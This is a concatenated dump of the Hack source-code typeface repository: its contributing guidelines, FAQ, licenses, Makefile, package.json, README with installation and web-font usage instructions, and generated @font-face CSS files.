style** for each glyph in the typeface sets. Glyph shape changes that are intended to address our design goals take precedence over changes that are purely subjective in nature. We offer the [alt-hack](https://github.com/source-foundry/alt-hack) repository for alternate Hack glyph styles and contributions of alternate styles are welcomed there. - Font-sizes between **8-14 px**, line-height >= 1 - **Cross-platform**, cross font renderer support on Linux, OS X, and Windows operating systems. Changes that address cross platform issues take precedence over issues that address platform specific issues. Changes that improve the typeface on some platforms but decrease its usability on others are generally not acceptable and belong in a fork that is intended for the platforms targeted for these changes. - Usage in **common source code display scenarios** (on digital displays): text editors, terminals, embedded as web fonts, etc. ## Goals, areas of improvement - **Legibility** - establish differences in the appearance of similar glyph shapes so as to properly identify different Unicode code points - **Readability** - glyph shape and spacing optimizations to improve the capacity to read character-character, word-word, and code block-code block combinations in source code - **Visual semantics** - establish semantic commonalities for glyphs used in source code text and create common visual designs within these semantic groups # Issue Reporting Issue reports from users are extremely important to foster the ongoing development of the typeface. Before you report an issue, please confirm that you have installed the current version of the Hack typeface on your system. See the [README.md page](README.md) for details. If you identify a problem, we request that you report it through a new issue report on the Github repository. Please include the following information in your (bug) issue report: - Font version (or timeframe when you downloaded the fonts if you do not know) - Where you obtained the fonts (e.g. repository download, package manager, another source) - variant(s) of the Hack fonts that are affected (Regular, Bold, Italic, BoldItalic) - font size at which the problem was observed and whether it occurs at other sizes within the Core design target range (see above) - operating system and version - application where the issue was observed and version (important for us to understand the renderer involved) - screenshot images that visually demonstrate the problem Please describe what led to the problem in detail. # Pull Requests We highly encourage contributions to the Hack typeface source code, repository scripts, and documentation. To view areas where we currently need your help, check out the active issues [Contribute! label](https://github.com/source-foundry/Hack/labels/Contribute%21). Please read and understand our design philosophy statement above in order to avoid frustration with work that we cannot merge upstream. We are willing to consider pull requests that follow these design guidelines. Having said that, there is never wasted work. If a change is of value to you, it is likely to be of value to others and this is the perfect situation for a downstream fork of Hack that you can maintain and share with other users. ## Pull requests for design changes Contributors who submit source modifications intended for merge into the Hack repository must license these changes according to [LICENSE.md](LICENSE.md). If this is not acceptable, please do not submit your work for consideration. Contributors who modify the UFO source code should familiarize themselves with the UFO source specification. The Hack typeface currently uses version 2 of the UFO specification and documentation is available [here](http://unifiedfontobject.org/versions/ufo2/index.html). For pull requests that modify the design of the typeface, we request that you limit your source commits to the following changes unless we have discussed and explicitly requested additional file changes as part of the contribution. ### Glyph modifications Modifications include all existing glyph design changes, glyph additions, and glyph deletions. - Only include the modified `glyphs/*.glif` source files for the modified glyphs in your pull request commits - Modification of other source files is not acceptable and pull requests will not be accepted until the above condition is met You can achieve this design modification workflow with one of the following approaches: - maintain a separate local directory for your design modifications and copy the `glyphs/*.glif` files that are changed to your local clone of the Hack source, then push to your remote repository fork for your pull request - modify the Hack source in your local clone of the Hack repository and do not commit file changes other than those that are accepted in pull requests (i.e. only include `*.ufo/glyphs/*.glif` files in your commits) - modify the Hack source in your local clone of the Hack repository, commit all files, replace all `*plist` files with the upstream versions then perform a git squash commit to eliminate the `*.plist` file changes in the git history (this approach can be used for those who didn't read the instructions and have already commited unacceptable file changes) ## Pull requests for script changes Contributors who submit script source modifications intended for merge into the Hack repository must license these changes according to the license specified in the script header for existing files. For new files, please discuss your license with us in an issue report before you submit your work for consideration. Please add an issue report that describes the issue that your pull request is intended to address (and that the pull request will close when merged). We request that you try not to add additional external dependencies to the project with your commits. This has the potential to prevent releases of Hack packages on some platforms. If you need to add a new dependency to the project, we suggest that you discuss this with us in advance through an issue report so that we can confirm that this is acceptable. ## Pull requests for documentation changes We love help with our docs! This includes anything from simple misspelling or grammar changes to major revisions of poorly written sections. For minor changes, a simple pull request suffices. For major edits, we recommend that you discuss the changes with us in an issue report before you go to the effort. # Contributors Contributions to the project come in many forms and we **want** to broadly acknowledge those who spend time and effort to improve the project. We understand that many contributions to open source projects are not in the form of changes to the code base and therefore not automatically recognized in the Github repository UI. Use case specialists play an extremely important role in the improvement of this typeface. Individuals who have knowledge of the intricacies of open source typeface licensing, understand open source project redistribution processes, have the capacity to view errors and test in unique platform x font renderer situations, and many other areas that extend beyond the "source code commit" criterion have contributed their expertise to improve Hack. Understanding this issue, we maintain a [CONTRIBUTORS.md](docs/CONTRIBUTORS.md) list to acknowledge project contributors for their time and efforts under our own defintion of a project contribution. If you feel that you have helped to improve Hack and your contributions have been overlooked (i.e. you are not included on the contributors list), please let us know so that we can rectify this issue! In all likelihood this is an oversight and not intended to be a slight.
Markdown
Hack/FAQ.md
# FAQ ### Contents - [Installation](#installation) - [Bugs/errors](#bugserrors) - [License](#license) - [Contribute](#contribute) - [Modifications/Derivatives](#modificationsderivatives) - [Tinkering](#tinkering) ## Installation #### How do I download the current version of the Hack desktop fonts? You can find the [current release of our desktop fonts](https://github.com/source-foundry/Hack/releases/latest) in our releases list. We recommend that Windows users consider the [Windows installer](https://github.com/source-foundry/Hack-windows-installer) as it addresses font caching issues for initial and repeat installs (for upgrades) that are problematic on the Windows platform. Hack packages are also available through many package managers for those who would prefer to use this approach. #### What build format are the Hack desktop fonts released in? The Hack desktop fonts are released in TrueType format (`.ttf`). #### How do I download the current version of the Hack web fonts? Please download the [current release of our web fonts](https://github.com/source-foundry/Hack/releases/latest) from our releases list. #### What build format are the Hack web fonts released in? The Hack web fonts are released in Web Open Font Format version 1.0 (`*.woff`) and 2.0 (`*.woff2`). #### How do I install Hack? Please see the Quick Installation guide on our [README.md](README.md) page. If you have further questions, please refer to the font installation instructions for your platform. A web search should yield all of the information that you need. #### How do I upgrade Hack? You can download [the latest release of desktop and web fonts]((https://github.com/source-foundry/Hack/releases/latest)). We recommend that Windows users upgrade with the [Windows installer](https://github.com/source-foundry/Hack-windows-installer) as it addresses problematic font caching issues that take place on the Windows platform. Hack packages are also available through many package managers for those who would prefer to use this approach. #### Is there a web font CDN that I can use in my web pages? Yes. See the Web Font Usage section of the [README.md](README.md) document for details. #### How do I find the changes that occurred in recent releases? Please review the [CHANGELOG.md](CHANGELOG.md) document. ## Bugs/errors #### I found a problem with Hack, what do I do? Please search our issue reports and confirm that your problem has not already been reported or solved. If it appears to be a new issue, please review the issue reporting information in our [CONTRIBUTING.md](CONTRIBUTING.md) document and then file a new issue report with the necessary information to address your problem. #### How do I find my installed Hack version number? Please refer to documentation for your operating system to determine how to find the font version string for installed fonts. If you cannot find a solution, you can install and use our [font-v tool](https://github.com/source-foundry/font-v) to view the version string with the command `font-v report [font path]`. ## License #### How is Hack licensed? Hack is a derivative of upstream Bitstream Vera Sans Mono and DejaVu Sans Mono source. The Hack changes are licensed under the MIT license. Bitstream Vera Sans Mono is licensed under the Bitstream Vera license and maintains reserved font names “Bitstream” and “Vera”. The DejaVu changes to the Bitstream Vera source were committed to the public domain. You may view the full text of the license in [LICENSE.md](LICENSE.md). #### Am I allowed to modify glyphs in Hack? Yes. #### Am I allowed to extend the character sets in Hack? Yes. #### Am I allowed to subset (decrease character set support) Hack? Yes. #### Am I allowed to create new build file types for Hack? Yes. #### Am I allowed to redistribute an unmodified version of Hack? Yes. #### Am I allowed to redistribute a modified version of Hack? Yes. #### Do I need to rename a modified version of “Hack”? As of v3.000, the reserved font name "Hack" was removed from our license. You may use the name "Hack" for modified versions of the source, though we encourage you to change the name in a way that indicates how this differs from the upstream source if you intend to release the typeface to others. See the Modifications/Derviatives section of the FAQ below for more information. #### Do I need to provide attribution when I use Hack? No. #### Do I need to maintain the license with modified or unmodified software that is derived from the Hack source? Yes. ## Contribute #### Do you accept design contributions to Hack? Yes. Design contributions are welcomed and encouraged. Please review and familiarize yourself with the design guidelines in the [CONTRIBUTING.md](CONTRIBUTING.md) documentation before you begin work intended as a contribution to the upstream project. If you question whether the work is acceptable in the upstream, we ask that you file a new issue report to discuss it before you begin. Having said that, there is no wasted work and if your changes are not appropriate for the upstream source, a new downstream fork with changes that are important to you (and that you maintain) is very much encouraged. #### How are my design contributions to Hack licensed? Changes to the Hack source are licensed under the MIT license. Please confirm that this is acceptable to you before you submit contributions for design changes. We do not accept design contributions under a different license. #### I am not a professional typeface designer, can I contribute design changes to Hack? Absolutely. To our knowledge, no contributor who has committed design changes to Hack has a background in professional typeface design or formal typeface design training. We developed an itch that needed to be scratched, combed websites and books for information, viewed lots (and lots and lots more) of typefaces, installed font editors and learned how to use them, and then went to work. We continue to learn ourselves. You are simply at a bit earlier stage of the same journey. Dive in, learn, and let's see what you can come up with. #### Do you accept source/script contributions to Hack? Yes. Changes to current scripts are licensed under the MIT license. If you intend to submit new, non-UFO (i.e. typeface design) source and would like to license it in a different way, please file an issue report to discuss this before you perform the work. #### I have never contributed to an open source project. Does the Hack project support brand new open source contributors? Yes! Yes! Yes! We would love to have individuals who are brand new to the open source development community experience collaborative free, open source development for the first time through the Hack project. We were all there at one stage and had to get past the initial contribution jitters. Putting your work out in the open for the first time can be a daunting, vulnerable experience and there is a great deal to learn about how the open source contribution workflow works. Don't let this stop you because this could be the first step on a long path of participation in collaborative open source software development. We would love to kickstart the work of a new open source developer and intend to maintain a very receptive environment for new participants. Read the [CONTRIBUTING.md](CONTRIBUTING.md) document, then feel free to pitch ideas that you have as [new issue reports](https://github.com/source-foundry/Hack/issues/new) on the repository. Let us know that you are new in town so that we can provide assistance where you might need it to get started. #### Can I submit ideas about design changes? Yes. Please understand our design priorities as defined in the [CONTRIBUTING.md](CONTRIBUTING.md) document and file your ideas as new issue reports. If you feel that the design priorities should be modified, feel free to submit a pull request with suggested changes or file a new issue report. We can discuss these modifications with either approach. #### How are my contributions to the Hack project recognized? Contributors are listed in the [CONTRIBUTORS.md](docs/CONTRIBUTORS.md) list. #### Who is considered a contributor to the Hack project? We attempt to broadly acknowledge contributions to the project as defined in the Contributors section of the [CONTRIBUTING.md](CONTRIBUTING.md) document. Please refer to that document for further details. ## Modifications/Derivatives #### I want to modify the Hack design and release it myself. Is this OK? Yes. #### I want to add character sets to Hack and release it myself. Is this OK? Yes. #### I want to decrease character set support in Hack and release it myself. Is this OK? Yes. #### I want to change Hack build file types and release it myself. Is this OK? Yes. #### I want to change the hinting approach used in Hack and release it myself. Is this OK? Yes. #### Do I need to provide attribution if I release my own project derived from Hack source? No. #### Do I need to modify the name of the typeface if I release a modified version? As of v3.000, the reserved font name "Hack" was removed from the license. It is no longer necessary to change the name for modified versions of the Hack source. Redistribution of modified source under the same name can be confusing to users and we would encourage you to modify the name in a way that clarifies your project goals relative to the upstream source if you intend to release the fonts to others. One approach is to add another term to the basename "Hack". For instance, a derivative that supports source code ligatures might be named "Hack Ligature" and a derivative that replaces the oval filled zero with a forward slash zero might be called "Hack Slash". #### Can I use Hack in the name of my own derived typeface (e.g. Hack Better)? Yes, this is highly encouraged if you modify the source and release it with the intent for others to use it. #### Can I change the name of a derived version and not use Hack in the name? Yes. #### If I make minor changes to the source and release this as my own project is this considered plagiarism? No. Absolutely not. This is well within the bounds of the license and you are welcome to do so. There are niche needs that some users have and our goal is to support these however minor through the development of derivative projects. We are attempting to make the build process, build tooling, and ability to pull any upstream source changes into your own downstream derivative as straightforward and simple as possible in order to support this. Also understand that you must maintain the upstream license in downstream derivatives. ## Tinkering #### Do you offer alternate styles of Hack glyphs that I can use to customize the fonts? Yes! The [alt-hack stylistic alternate glyph library](https://github.com/source-foundry/alt-hack) is available with `*.glif` files that contain new glyph designs for glyphs that exist in the Hack character sets. Copy the `.glif` file from the alt-hack library to the Hack source and overwrite the existing `.glif` file. Then rebuild the fonts with the instructions in [docs/BUILD.md](docs/BUILD.md). #### How do I change the font name? The simplest approach is to open the UFO source code in a font editor and follow the instructions in the editor documentation, then re-save the UFO source to maintain the name changes (if you plan for repeat builds from source) and rebuild the font files. #### How do I modify the line spacing in Hack? We built the tool [font-line](https://github.com/source-foundry/font-line) to increase and decrease line spacing in Hack (and any other font). Please see the documentation in the font-line repository README for details. #### How do I modify the version string in a derivative that I create from the Hack source? You can approach this by either modifying the version in the UFO source or through the use of our [font-v](https://github.com/source-foundry/font-v) versioning tool. Please see the font-v repository for detailed usage instructions.
Markdown
Hack/LICENSE.md
The work in the Hack project is Copyright 2018 Source Foundry Authors and licensed under the MIT License The work in the DejaVu project was committed to the public domain. Bitstream Vera Sans Mono Copyright 2003 Bitstream Inc. and licensed under the Bitstream Vera License with Reserved Font Names "Bitstream" and "Vera" ### MIT License Copyright (c) 2018 Source Foundry Authors Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ### BITSTREAM VERA LICENSE Copyright (c) 2003 by Bitstream, Inc. All Rights Reserved. Bitstream Vera is a trademark of Bitstream, Inc. Permission is hereby granted, free of charge, to any person obtaining a copy of the fonts accompanying this license ("Fonts") and associated documentation files (the "Font Software"), to reproduce and distribute the Font Software, including without limitation the rights to use, copy, merge, publish, distribute, and/or sell copies of the Font Software, and to permit persons to whom the Font Software is furnished to do so, subject to the following conditions: The above copyright and trademark notices and this permission notice shall be included in all copies of one or more of the Font Software typefaces. The Font Software may be modified, altered, or added to, and in particular the designs of glyphs or characters in the Fonts may be modified and additional glyphs or characters may be added to the Fonts, only if the fonts are renamed to names not containing either the words "Bitstream" or the word "Vera". This License becomes null and void to the extent applicable to Fonts or Font Software that has been modified and is distributed under the "Bitstream Vera" names. The Font Software may be sold as part of a larger software package but no copy of one or more of the Font Software typefaces may be sold by itself. THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL BITSTREAM OR THE GNOME FOUNDATION BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM OTHER DEALINGS IN THE FONT SOFTWARE. Except as contained in this notice, the names of Gnome, the Gnome Foundation, and Bitstream Inc., shall not be used in advertising or otherwise to promote the sale, use or other dealings in this Font Software without prior written authorization from the Gnome Foundation or Bitstream Inc., respectively. For further information, contact: fonts at gnome dot org.
Hack/Makefile
all: build archives: postbuild_processing/archive_prep/archiver.sh build: ttf webfonts build-with-dependencies: source/*.ufo ./build-ttf.sh --install-dependencies ./build-woff.sh --install-dependencies ./build-woff2.sh --install-dependencies ./build-subsets.sh css: tools/scripts/css/css-build.sh lint: shellcheck ufolint shellcheck: build-ttf.sh build-woff.sh build-woff2.sh build-subsets.sh tools/scripts/install/ttfautohint-build.sh postbuild_processing/archive_prep/archiver.sh tools/scripts/css/css-build.sh $@ $^ subsets: source/*.ufo ./build-subsets.sh ttf: ./build-ttf.sh ufolint: source/*.ufo $@ $^ webfonts: ./build-woff.sh ./build-woff2.sh ./build-subsets.sh woff: ./build-woff.sh woff2: ./build-woff2.sh
JSON
Hack/package.json
{ "name": "hack-font", "version": "3.3.0", "description": "A typeface designed for source code", "repository": { "type": "git", "url": "git+https://github.com/source-foundry/Hack.git" }, "license": "SEE LICENSE IN LICENSE.md", "bugs": { "url": "https://github.com/source-foundry/Hack/issues" }, "homepage": "https://github.com/source-foundry/Hack#readme" }
Markdown
Hack/README.md
# Hack [![GitHub release](https://img.shields.io/github/release/source-foundry/hack.svg?style=flat)](https://github.com/source-foundry/Hack/releases/latest) [![Build Status](https://semaphoreci.com/api/v1/sourcefoundry/hack/branches/master/shields_badge.svg)](https://semaphoreci.com/sourcefoundry/hack) [![Contributors](https://img.shields.io/badge/contributors-129-orange.svg?style=flat)](https://github.com/source-foundry/Hack/blob/master/docs/CONTRIBUTORS.md) [![Join the chat at https://gitter.im/source-foundry/Hack](https://badges.gitter.im/source-foundry/Hack.svg)](https://gitter.im/source-foundry/Hack) [![Github All Releases](https://img.shields.io/github/downloads/source-foundry/hack/total.svg?style=flat)](https://github.com/source-foundry/Hack/releases/latest) [![](https://data.jsdelivr.com/v1/package/npm/hack-font/badge?style=rounded)](https://www.jsdelivr.com/package/npm/hack-font) Don't like the development noise from the repository but want to keep up with changes? Check out our [gitter Hack channel](https://gitter.im/source-foundry/Hack). Have a quick question that doesn't require an issue report? Drop by our [gitter Help channel](https://gitter.im/source-foundry/Help) and ask away. ### A typeface designed for source code Hack is designed to be a workhorse typeface for source code. It has deep roots in the free, open source typeface community and expands upon the contributions of the [Bitstream Vera](https://www.gnome.org/fonts/) &amp; [DejaVu](https://dejavu-fonts.github.io/) projects. The large x-height + wide aperture + low contrast design make it legible at commonly used source code text sizes with a sweet spot that runs in the 8 - 14 range. The full set of changes to the upstream source are available in the [changelog](CHANGELOG.md). The project is in active development, and we welcome your input and contributions. You may view our design objectives and instructions on how to contribute in [CONTRIBUTING.md](CONTRIBUTING.md). Frequently asked questions are answered in our [FAQ](FAQ.md). ### Contents * [Features](#overview-of-features) * [Quick installation](#quick-installation) * [Package manager installation](#package-managers) * [Web font usage](#web-font-usage) * [Additional tools for font customization](#additional-tools-for-hack-font-customization) * [Resources](#resources) * [Contributing](#contributing) * [Build tools](#built-with) * [Acknowledgments](#acknowledgments) * [License](#license) ### Specimen <a href="http://source-foundry.github.io/Hack/font-specimen.html"><img src="img/hack-specimen-3-crunch.png" alt="Hack &mdash; a typeface designed for source code" width="728"></a> ## Overview of features - **Typeface Name**: Hack - **Category**: Monospaced - **Character set support**: ASCII, Latin-1, Latin Extended A, Greek, Cyrillic - **Powerline Support**: Yes, included by default - **Included Styles**: Regular, Bold, Italic, Bold Italic ## Quick installation **NOTE ON FONT UPDATES** *If you are updating your version of Hack, be sure to remove the previously installed version and clear your font cache first to avoid conflicts that can lead to platform-specific rendering errors. Many platforms/distros offer package managers that automate this process. We release a Windows installer to automate the install/update process on the Windows platform. See below for additional details.* ### Linux 1. Download the [latest version of Hack][ttf_latest]. 2. Extract the files from the archive (`.zip`). 3. Copy the font files to either your system font folder (often `/usr/share/fonts/`) or user font folder (often `~/.local/share/fonts/` or `/usr/local/share/fonts`). 4. Copy the font configuration file in `config/fontconfig/` to either the system font configuration folder (often `/etc/fonts/conf.d/`) or the font user folder (often `~/.config/fontconfig/conf.d`) 5. Clear and regenerate your font cache and indexes with the following command: ``` $ fc-cache -f -v ``` You can confirm that the fonts are installed with the following command: ``` $ fc-list | grep "Hack" ``` Some Linux users may find that font rendering is improved on their distro with [these instructions](https://wiki.manjaro.org/index.php?title=Improve_Font_Rendering). ### macOS 1. Download the [latest version of Hack][ttf_latest]. 2. Extract the files from the archive (`.zip`) and click to open them. 3. Follow the instructions from your operating system. 4. Enjoy! ### Windows [![Hack Windows Installer](https://img.shields.io/badge/Windows-Installer-blue.svg?style=flat-square)](https://github.com/source-foundry/Hack-windows-installer/releases/latest) The [Hack Windows Installer](https://github.com/source-foundry/Hack-windows-installer/releases/latest) simplifies installation on the Windows platform. The tool guides you through the installation process and addresses some common rendering issues that occur with font installs/updates on the Windows platform. This tool is the recommended installation approach for Windows users. ### Chrome/ChromeOS To use with [Secure Shell](https://chrome.google.com/webstore/detail/secure-shell/pnhechapfaindjhompbnflcldabbghjo), edit the following fields in Options: - font-family: `"Hack"` - user-css: `https://cdn.jsdelivr.net/npm/hack-font@3/build/web/hack.css` ## Package managers We highly recommend the convenience of a community developed package manager or other auto-updating utility if this is available on your platform. While the package manager releases may be a bit delayed relative to the repository releases, the packages distributed through these package managers were designed to tune and automate font installs and updates on your system. We are aware of Hack support in the following package managers (with associated package names): - **Arch Linux**: `ttf-hack` - **Chocolatey (Windows)**: `hackfont` - **Debian**: `fonts-hack-ttf` - **Fedora / CentOS**: `dnf-plugins-core :: heliocastro/hack-fonts :: hack-fonts` - **Gentoo Linux**: `media-fonts/hack` - **Homebrew Cask (OS X)**: `homebrew/cask-fonts/font-hack` - **Open BSD**: `fonts/hack-fonts` - **OpenSUSE**: `hack-fonts` - **Ubuntu**: `fonts-hack-ttf` - **Visual Studio Package Manager**: `hack.font` For installation issues with Hack packages, please contact the package maintainer directly. ## Web font usage Hack is available in the woff and woff2 web font formats. **Bold** and *italic* styles are included by default and work out-of-the-box via the `<strong>` and `<em>` tags. Hack is available through the jsDelivr and cdnjs CDN services: [![jsDelivr](https://img.shields.io/badge/jsDelivr-Hack_web_font_CDN-blue.svg?style=flat-square)](https://www.jsdelivr.com/package/npm/hack-font) [![cdnjs](https://img.shields.io/badge/cdnjs-Hack_web_font_CDN-blue.svg?style=flat-square)](https://cdnjs.com/libraries/hack-font) The following snippets provide examples of Hack web font use through the jsDelivr CDN. Adjust the URL paths to those provided by cdnjs (click the link above to find the appropriate URL) to switch to the cdnjs CDN. #### 1. Add Hack to HTML Include one of the following in the &lt;head&gt; section of your HTML file: **Subset web fonts** ```html <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hack-font@3/build/web/hack-subset.css"> ``` **Full character set web fonts** ```html <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hack-font@3/build/web/hack.css"> ``` #### 2. Add Hack to CSS ```css pre, code { font-family: Hack, monospace; } ``` See the [WEBFONT_USAGE.md](docs/WEBFONT_USAGE.md) documentation for additional details, including instructions on how to download, host, and serve the web fonts on your web server. ## Additional tools for Hack font customization ### Customize your build with alternate glyph styles The [alt-hack](https://github.com/source-foundry/alt-hack) library includes a (growing) collection of alternate glyph styles that can be used to customize your Hack fonts. Don't like the default zero style? Swap out the UFO design source with a slashed zero or dotted zero and build new fonts that work better for you. We welcome contributions of new alternate glyph styles in the alt-hack repository. Design something new that works well with rest of the typeface and submit a pull request to the alt-hack repository so that others can use it in their custom builds. Detailed build instructions are available on the [alt-hack repository README.md](https://github.com/source-foundry/alt-hack). Font renaming instructions to support side-by-side installs with upstream Hack are available below. ### Line spacing adjustments [font-line](https://github.com/source-foundry/font-line) is a tool that modifies the default line spacing used in the Hack design (20% UPM). The following gist installs font-line and modifies line spacing for all desktop font files contained in the same directory: - [linespace.sh](https://gist.github.com/chrissimpkins/f39e85f5f157d839e46168de1b61a174) ([download .zip](https://gist.github.com/chrissimpkins/f39e85f5f157d839e46168de1b61a174/archive/f3f93dea87d64ddc4684a61cbc96ddf79d30824a.zip)) ### Install modified and unmodified versions of Hack on the same system If you modify the upstream Hack source or the released font binaries and would like to install your modified fonts on the same system with the Hack fonts as released here, you can use the [fontname.py Python script](https://github.com/chrissimpkins/fontname.py) to define a new font name in the binary files. For example, you can install `Hack` on your platform along with a 15% UPM line spacing adjusted version as `Hack Fifteen`. Modify default glyphs with those in our [alt-hack repository](https://github.com/source-foundry/alt-hack) or design your own and define your creation with any name that you'd like. Following installation, your renamed fonts should show under the name that you define with the script so that you can switch between any of them as you need. Usage details and examples are provided on the fontname.py repository README. ## Resources * [Full specimen](http://source-foundry.github.io/Hack/font-specimen.html) * [Changelog](CHANGELOG.md) * [Project website](http://sourcefoundry.org/hack/) * [Contributors](docs/CONTRIBUTORS.md) ## Contributing We welcome contributions to Hack! Please review our [CONTRIBUTING.md](CONTRIBUTING.md) document for details. ## Built With Hack is built with the following free, open source projects: - [Font Bakery](https://github.com/googlefonts/fontbakery) - post-compilation modifications - [fontmake](https://github.com/googlei18n/fontmake) - UFO to ttf compilation - [fontTools](https://github.com/fonttools/fonttools) - OpenType table read/write - [font-v](https://github.com/source-foundry/font-v) - font version string editor - [ink](https://github.com/chrissimpkins/ink) - stream editor for text file templating - [OpenFV](https://github.com/openfv/openfv) - open specification for semantic typeface versioning - [sfnt2woff_zopfli](https://github.com/bramstein/sfnt2woff-zopfli) - ttf to woff web font compilation - [ttfautohint](https://www.freetype.org/ttfautohint/) - ttf instruction sets - [uni](https://github.com/source-foundry/uni) - Unicode code point search - [ufodiff](https://github.com/source-foundry/ufodiff) - UFO source diffs - [ufoLib](https://github.com/unified-font-object/ufoLib) - UFO source file reads/writes/testing - [ufolint](https://github.com/source-foundry/ufolint) - UFO source file linting for CI testing - [woff2](https://github.com/google/woff2) - ttf to woff2 web font compilation ## Acknowledgments We would like to acknowledge and thank the [jsDelivr](https://www.jsdelivr.com/) and [cdnjs](https://cdnjs.com) teams for their support of the Hack project through their free web font CDN services. We greatly appreciate the tremendous support of open source software development by the [Semaphore CI](https://semaphoreci.com/) team. Their free CI testing service and rapid, excellent technical support have been tremendous assets for our project. Lastly, a huge thanks go out to all of those who do the unrecognized work to get Hack out there to users so that it is easy to access, install, upgrade, and use. There are redistribution package managers, review committee members, testers, and others across platforms/distros/applications who perform this thankless work and often go unrecognized. Your efforts are much appreciated. ## License **Hack** work is &copy; 2018 Source Foundry Authors. MIT License **Bitstream Vera Sans Mono** &copy; 2003 Bitstream, Inc. (with Reserved Font Names _Bitstream_ and _Vera_). Bitstream Vera License. The font binaries are released under a license that permits unlimited print, desktop, web, and software embedding use for commercial and non-commercial applications. See [LICENSE.md](https://github.com/source-foundry/Hack/blob/master/LICENSE.md) for the full texts of the licenses. <!-- Link to the latest release archive for README.md file --> [ttf_latest]: https://github.com/source-foundry/Hack/releases/download/v3.003/Hack-v3.003-ttf.zip
Hack/build/web/hack-subset.css
/*! * Hack typeface https://github.com/source-foundry/Hack * License: https://github.com/source-foundry/Hack/blob/master/LICENSE.md */ /* FONT PATHS * -------------------------- */ @font-face { font-family: 'Hack'; src: url('fonts/hack-regular-subset.woff2?sha=3114f1256') format('woff2'), url('fonts/hack-regular-subset.woff?sha=3114f1256') format('woff'); font-weight: 400; font-style: normal; font-display: swap; } @font-face { font-family: 'Hack'; src: url('fonts/hack-bold-subset.woff2?sha=3114f1256') format('woff2'), url('fonts/hack-bold-subset.woff?sha=3114f1256') format('woff'); font-weight: 700; font-style: normal; font-display: swap; } @font-face { font-family: 'Hack'; src: url('fonts/hack-italic-subset.woff2?sha=3114f1256') format('woff2'), url('fonts/hack-italic-subset.woff?sha=3114f1256') format('woff'); font-weight: 400; font-style: italic; font-display: swap; } @font-face { font-family: 'Hack'; src: url('fonts/hack-bolditalic-subset.woff2?sha=3114f1256') format('woff2'), url('fonts/hack-bolditalic-subset.woff?sha=3114f1256') format('woff'); font-weight: 700; font-style: italic; font-display: swap; }
Inno Setup Script
Hack/build/web/hack-subset.css.in
/*! * Hack typeface https://github.com/source-foundry/Hack * License: https://github.com/source-foundry/Hack/blob/master/LICENSE.md */ /* FONT PATHS * -------------------------- */ @font-face { font-family: 'Hack'; src: url('fonts/hack-regular-subset.woff2?sha={{ ink }}') format('woff2'), url('fonts/hack-regular-subset.woff?sha={{ ink }}') format('woff'); font-weight: 400; font-style: normal; font-display: swap; } @font-face { font-family: 'Hack'; src: url('fonts/hack-bold-subset.woff2?sha={{ ink }}') format('woff2'), url('fonts/hack-bold-subset.woff?sha={{ ink }}') format('woff'); font-weight: 700; font-style: normal; font-display: swap; } @font-face { font-family: 'Hack'; src: url('fonts/hack-italic-subset.woff2?sha={{ ink }}') format('woff2'), url('fonts/hack-italic-subset.woff?sha={{ ink }}') format('woff'); font-weight: 400; font-style: italic; font-display: swap; } @font-face { font-family: 'Hack'; src: url('fonts/hack-bolditalic-subset.woff2?sha={{ ink }}') format('woff2'), url('fonts/hack-bolditalic-subset.woff?sha={{ ink }}') format('woff'); font-weight: 700; font-style: italic; font-display: swap; }
Hack/build/web/hack.css
/*! * Hack typeface https://github.com/source-foundry/Hack * License: https://github.com/source-foundry/Hack/blob/master/LICENSE.md */ /* FONT PATHS * -------------------------- */ @font-face { font-family: 'Hack'; src: url('fonts/hack-regular.woff2?sha=3114f1256') format('woff2'), url('fonts/hack-regular.woff?sha=3114f1256') format('woff'); font-weight: 400; font-style: normal; font-display: swap; } @font-face { font-family: 'Hack'; src: url('fonts/hack-bold.woff2?sha=3114f1256') format('woff2'), url('fonts/hack-bold.woff?sha=3114f1256') format('woff'); font-weight: 700; font-style: normal; font-display: swap; } @font-face { font-family: 'Hack'; src: url('fonts/hack-italic.woff2?sha=3114f1256') format('woff2'), url('fonts/hack-italic.woff?sha=3114f1256') format('woff'); font-weight: 400; font-style: italic; font-display: swap; } @font-face { font-family: 'Hack'; src: url('fonts/hack-bolditalic.woff2?sha=3114f1256') format('woff2'), url('fonts/hack-bolditalic.woff?sha=3114f1256') format('woff'); font-weight: 700; font-style: italic; font-display: swap; }
Inno Setup Script
Hack/build/web/hack.css.in
